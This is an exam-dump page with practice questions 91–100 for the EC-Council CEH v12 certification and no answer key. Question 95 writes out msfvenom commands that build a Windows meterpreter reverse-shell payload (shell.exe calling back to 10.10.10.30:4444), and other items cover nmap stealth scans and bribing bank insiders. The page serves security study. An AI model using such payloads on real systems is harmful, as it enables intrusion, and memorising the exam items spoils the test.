Exam Details

  • Exam Code
    :312-50V12
  • Exam Name
    :EC-Council Certified Ethical Hacker (C|EH v12)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :596 Q&As
  • Last Updated
    :Apr 16, 2025

EC-COUNCIL EC-COUNCIL Certifications 312-50V12 Questions & Answers

  • Question 91:

    You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because

    organizations such as banks are generally tight and secure when it comes to protecting their systems.

    In other words, you are trying to penetrate an otherwise impenetrable system.

    How would you proceed?

    A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network.

    B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly- paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information.

    C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100, 000 or more "zombies" and "bots".

    D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques.

  • Question 92:

    Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames and passwords are shared in plaintext, paving the way for hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?

    A. FTP

    B. HTTPS

    C. FTPS

    D. IP

  • Question 93:

    Sam, a professional hacker, targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS 1AM credentials and further compromise the employee's account. What is the technique used by Sam to compromise the AWS IAM credentials?

    A. Social engineering

    B. insider threat

    C. Password reuse

    D. Reverse engineering

  • Question 94:

    John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?

    A. Use his own public key to encrypt the message.

    B. Use Marie's public key to encrypt the message.

    C. Use his own private key to encrypt the message.

    D. Use Marie's private key to encrypt the message.

  • Question 95:

    What is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

    A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

    B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

    C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

    D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  • Question 96:

    During a black-box pen test, you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?

    A. Circuit

    B. Stateful

    C. Application

    D. Packet Filtering

  • Question 97:

    What would you enter if you wanted to perform a stealth scan using Nmap?

    A. nmap -sM

    B. nmap -sU

    C. nmap -sS

    D. nmap -sT

  • Question 98:

    John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

    A. Create an incident checklist.

    B. Select someone else to check the procedures.

    C. Increase his technical skills.

    D. Read the incident manual every time it occurs.

  • Question 99:

    During an Xmas scan what indicates a port is closed?

    A. No return response

    B. RST

    C. ACK

    D. SYN

  • Question 100:

    The company ABC recently contracts a new accountant. The accountant will be working with the financial statements. These financial statements need to be approved by the CFO before being sent to the accountant. The CFO is concerned and wants to ensure that the information sent to the accountant is not modified after his approval. Which of the following options can be useful to ensure the integrity of the data?

    A. The CFO can use a hash algorithm in the document once he approved the financial statements.

    B. The CFO can use an excel file with a password.

    C. The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure is the same document.

    D. The document can be sent to the accountant using an exclusive USB for that document.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-50V12 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.